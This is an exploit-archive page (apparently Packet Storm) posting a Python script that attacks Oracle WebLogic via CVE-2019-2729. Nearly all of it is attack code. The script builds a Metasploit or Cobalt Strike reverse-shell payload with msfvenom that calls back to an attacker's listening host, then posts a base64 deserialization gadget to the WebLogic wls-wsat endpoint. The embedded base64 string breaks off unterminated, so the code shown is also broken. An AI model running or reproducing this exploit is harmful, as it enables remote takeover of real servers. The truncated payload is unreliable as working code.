exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Oracle Weblogic 10.3.6.0.0 Remote Command Execution

Oracle Weblogic 10.3.6.0.0 Remote Command Execution
Posted Jan 9, 2020
Authored by Paveway3, Waffles

Oracle Weblogic version 10.3.6.0.0 remote command execution exploit.

tags | exploit, remote
advisories | CVE-2019-2729
SHA-256 | 4ad6e21c3fcb977e0023dfe9a1803b6c73be6d865d1688b219b016e75cb5608d

Oracle Weblogic 10.3.6.0.0 Remote Command Execution

Change Mirror Download
# Exploit Title: Oracle Weblogic 10.3.6.0.0 - Remote Command Execution
# Date: 2020-01-08
# Exploit Author: Waffles & Paveway3
# Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html
# Version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0
# Tested on: Windows
# CVE : CVE-2019-2729

SerialLogic.py

# Exploit Title: SerialLogic
# Date: 01-08-2020
# Exploit Author: Waffles & Paveway3
# Vendor Homepage: https://www.oracle.com/middleware/technologies/weblogic.html
# Version: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0
# Tested on: Windows
# CVE : CVE-2019-2729

import argparse
import requests
import sys
import os
import base64

# Colors for terminal output because I likes pretty things
class bcolors:
OKGREEN = '\033[92m'
BOLD = '\033[1m'
NONERED = '\033[91m'
ENDLINE = '\033[0m'
UNDERLINE = '\033[4m'

banner = """\n
_______ ________ ___ ____ _______ ___ ________ ____
/ ____/ | / / ____/ |__ \ / __ < / __ \ |__ \/__ /__ \/ __ \
/ / | | / / __/________/ // / / / / /_/ /_______/ / / /__/ / /_/ /
/ /___ | |/ / /__/_____/ __// /_/ / /\__, /_____/ __/ / // __/\__, /
\____/ |___/_____/ /____/\____/_//____/ /____/ /_//____/____/
"""

print(banner)

parser = argparse.ArgumentParser()
parser.add_argument('-cs', dest='cobaltstrike', default=False, required=False, help="Use Cobalt Strike as callback", action='store_true')
parser.add_argument('-msf', dest='metasploit', default=False, required=False, help="Use Metasploit Handler as callback", action='store_true')
parser.add_argument('-rhost', dest='target_host', default='', required=True, help="Target Host")
parser.add_argument('-rport', dest='target_port', default='', required=True, help="Target Port")
parser.add_argument('-lhost', dest='listen_host', default='', required=True, help="Listening host IP for callback")
parser.add_argument('-lport', dest='listen_port', default='', required=True, help="Listening port for callback")
parser.add_argument('-ssl', dest='usessl', default=False, required=False, help="Use HTTPS instead of HTTP", action='store_true')
args = parser.parse_args()

print("\n")

# Assign user arguments to variables we can use
cobaltstrike = str(args.cobaltstrike)
metasploit = str(args.metasploit)
target_host = str(args.target_host)
target_port = str(args.target_port)
listen_host = str(args.listen_host)
listen_port = str(args.listen_port)
usessl = str(args.usessl)

if cobaltstrike == 'True':
cobaltstrike = True
else:
cobaltstrike = False
if metasploit == 'True':
metasploit = True
else:
metasploit = False
if usessl == 'True':
usessl = True
else:
usessl = False

if metasploit and not cobaltstrike:
os.system("msfvenom -p windows/meterpreter/reverse_tcp LHOST=" + listen_host + " LPORT=" + listen_port + " -f psh-cmd -o /tmp/CVE_2019_2729_MSF.txt > /dev/null 2>&1")
with open('/tmp/CVE_2019_2729_MSF.txt', 'r') as msfcmd:
the_cmd = msfcmd.read()
elif cobaltstrike and not metasploit:
os.system("msfvenom -p windows/meterpreter/reverse_http LHOST=" + listen_host + " LPORT=" + listen_port + " -f psh-cmd -o /tmp/CVE_2019_2729_CS.txt > /dev/null 2>&1")
with open('/tmp/CVE_2019_2729_CS.txt', 'r') as cscmd:
the_cmd = cscmd.read()
else:
print("Please try with ONE of the payload options.")
sys.exit()

headers = {
'Content-Type':'text/xml',
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0',
'SOAPAction':'',
'lfcmd':'' + the_cmd
}

data_pref = '<?xml version="1.0" encoding="utf-8"?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <array method="forName"> <string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string> <void>'
yss_payload = "CjxhcnJheSBjbGFzcz0iYnl0ZSIgbGVuZ3RoPSI2ODYyIj48dm9pZCBpbmRleD0iMTYwMSI+PGJ5dGU+MTAwPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTM4MSI+PGJ5dGU+NjQ8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyODkzIj48Ynl0ZT42NTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjEyMzUiPjxieXRlPjk5PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTE1Ij48Ynl0ZT4xMDg8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxMDkyIj48Ynl0ZT4xMTU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyNjE5Ij48Ynl0ZT42NjwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjIwOTEiPjxieXRlPjcyPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNjM1NCI+PGJ5dGU+MTA8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyMTY0Ij48Ynl0ZT4xMTU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxNTc4Ij48Ynl0ZT4xMDQ8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI4OTciPjxieXRlPjEwMTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjE2MjUiPjxieXRlPjEyPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNjY0MSI+PGJ5dGU+NzI8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI2MjYyIj48Ynl0ZT40NzwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjM3MCI+PGJ5dGU+MTA1PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMjIxNiI+PGJ5dGU+NzQ8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI1MTQ3Ij48Ynl0ZT4xMTY8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxMjU1Ij48Ynl0ZT4xMDk8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyMDQiPjxieXRlPjEwMTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjE0ODQiPjxieXRlPjk3PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNDEwOCI+PGJ5dGU+NjU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxNjQyIj48Ynl0ZT4xMTE8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI0MzE4Ij48Ynl0ZT4xMDU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI2NjUyIj48Ynl0ZT4yMTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjYzMjQiPjxieXRlPjI8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI0OTY1Ij48Ynl0ZT4xMDE8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI2MTcxIj48Ynl0ZT40OTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjM2NTIiPjxieXRlPjY1PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTc4MyI+PGJ5dGU+MTA5PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMjc2NiI+PGJ5dGU+MTAwPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNTU5NCI+PGJ5dGU+MjwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9Ijk0MiI+PGJ5dGU+MTA4PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNDc4NiI+PGJ5dGU+NzY8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyMzU5Ij48Ynl0ZT4xMTk8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI1MzQxIj48Ynl0ZT4xMDU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI1MjkiPjxieXRlPjExMTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjE3NTkiPjxieXRlPjExODwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjMxNDgiPjxieXRlPjEwNDwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjUyNjkiPjxieXRlPjExMTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjU0MzIiPjxieXRlPjExNTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjIxMzkiPjxieXRlPjEwNTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjM2Ij48Ynl0ZT4tMzU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIzNTQ4Ij48Ynl0ZT44MjwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjQ3ODgiPjxieXRlPjk3PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTU0MSI+PGJ5dGU+NTA8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI1ODgxIj48Ynl0ZT40PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNTk0NyI+PGJ5dGU+LTc0PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNTIzNSI+PGJ5dGU+OTc8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyMTQ0Ij48Ynl0ZT43MDwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjMzNjEiPjxieXRlPjEwNDwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjI5NDciPjxieXRlPjg3PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMjQwOCI+PGJ5dGU+MTA4PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNjE4MyI+PGJ5dGU+MTAxPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTMyMCI+PGJ5dGU+NTA8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxODEzIj48Ynl0ZT4xMDM8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyODA4Ij48Ynl0ZT4xMTI8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIyMDMiPjxieXRlPjgzPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNDI4NiI+PGJ5dGU+MTE1PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTY4OSI+PGJ5dGU+NDE8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIzNTgwIj48Ynl0ZT42OTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjMxMjEiPjxieXRlPjQ4PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMzEwMCI+PGJ5dGU+NjU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI0MTQyIj48Ynl0ZT42NTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjUzNyI+PGJ5dGU+OTc8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIxNDE3Ij48Ynl0ZT4xMTU8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSI0NDk4Ij48Ynl0ZT41OTwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjE5MzciPjxieXRlPjY1PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMjk4NSI+PGJ5dGU+MTA0PC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iMTUwMCI+PGJ5dGU+MTAxPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRleD0iNTQ0NyI+PGJ5dGU+NTY8L2J5dGU+PC92b2lkPjx2b2lkIGluZGV4PSIzMzA0Ij48Ynl0ZT43MDwvYnl0ZT48L3ZvaWQ+PHZvaWQgaW5kZXg9IjUwOTciPjxieXRlPjczPC9ieXRlPjwvdm9pZD48dm9pZCBpbmRl
data = base64.b64decode(yss_payload)
data_payload = data_pref + data.decode()
if usessl:
attackurl = "https://" + str(target_host) + ":" + str(target_port) + str("/wls-wsat/CoordinatorPortType")
else:
attackurl = "http://" + str(target_host) + ":" + str(target_port) + str("/wls-wsat/CoordinatorPortType")
res = requests.post(attackurl, headers=headers, data=data_payload, timeout=10)

if cobaltstrike and not metasploit:
cmd_exec = "Cobalt Strike"
elif not cobaltstrike and metasploit:
cmd_exec = "Metasploit"
print(bcolors.OKGREEN + "[+] Command executed was a " + cmd_exec + " Payload, please check your console" + bcolors.ENDLINE)
print(bcolors.OKGREEN + "[+] Cleaning up...." + bcolors.ENDLINE)

if os.path.exists("/tmp/CVE_2019_2729_MSF.txt"):
os.remove("/tmp/CVE_2019_2729_MSF.txt")
elif os.path.exists("/tmp/CVE_2019_2729_CS.txt"):
os.remove("/tmp/CVE_2019_2729_CS.txt")
Login or Register to add favorites

File Archive:

February 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    11 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    0 Files
  • 6
    Feb 6th
    0 Files
  • 7
    Feb 7th
    0 Files
  • 8
    Feb 8th
    0 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close